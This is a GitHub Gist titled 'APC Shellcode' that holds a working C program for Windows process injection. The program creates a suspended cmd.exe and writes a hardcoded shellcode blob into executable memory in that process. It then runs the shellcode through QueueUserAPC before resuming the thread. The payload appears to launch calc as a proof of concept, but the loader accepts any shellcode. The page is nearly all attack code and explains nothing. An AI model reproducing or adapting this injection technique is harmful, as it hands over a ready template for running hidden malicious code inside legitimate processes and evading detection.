Last active
January 13, 2023 02:51
-
-
Save Agahlot/b320a40b56c6de25007d390e27651e16 to your computer and use it in GitHub Desktop.
APC Shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#include <TlHelp32.h> | |
int main(int argc, char **argv) | |
{ | |
char *shellcode = | |
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" | |
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" | |
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" | |
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" | |
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" | |
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" | |
"\x45\x81\x3e\x43\x72\x65\x61\x75" | |
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" | |
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" | |
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" | |
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" | |
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" | |
"\x6c\x63\x89\xe2\x52\x52\x53\x53" | |
"\x53\x53\x53\x53\x52\x53\xff\xd7"; | |
HANDLE hThread; | |
HANDLE hProcess; | |
PROCESS_INFORMATION processInfo; | |
STARTUPINFOA info; | |
ZeroMemory(&info, sizeof(info)); | |
ZeroMemory(&processInfo, sizeof(processInfo)); | |
DWORD oldProtect; | |
char pPath[] = "C:\\Windows\\System32\\cmd.exe"; | |
CreateProcessA(pPath, NULL, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, &info, &processInfo); | |
printf("@g3troot - Length : %d bytes\n", strlen(shellcode)); | |
printf("Allocating Remote Memory For Shellcode\n"); | |
LPVOID resultPtr = VirtualAllocEx(processInfo.hProcess, NULL, strlen(shellcode) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
printf("Shellcode Address: 0x%X\n", (unsigned int)resultPtr); | |
printf("Write Shellcode To Remote Process\n"); | |
WriteProcessMemory(processInfo.hProcess, resultPtr, shellcode, strlen(shellcode) + 1, NULL); | |
int targetProc = processInfo.dwProcessId; | |
printf("PID: cmd.exe - %d\n", targetProc); | |
hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, processInfo.dwThreadId); | |
QueueUserAPC((PAPCFUNC)resultPtr, hThread, NULL); | |
ResumeThread(hThread); | |
CloseHandle(hProcess); | |
CloseHandle(hThread); | |
VirtualFreeEx(processInfo.hProcess, resultPtr, strlen(shellcode), MEM_RELEASE); | |
return EXIT_SUCCESS; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment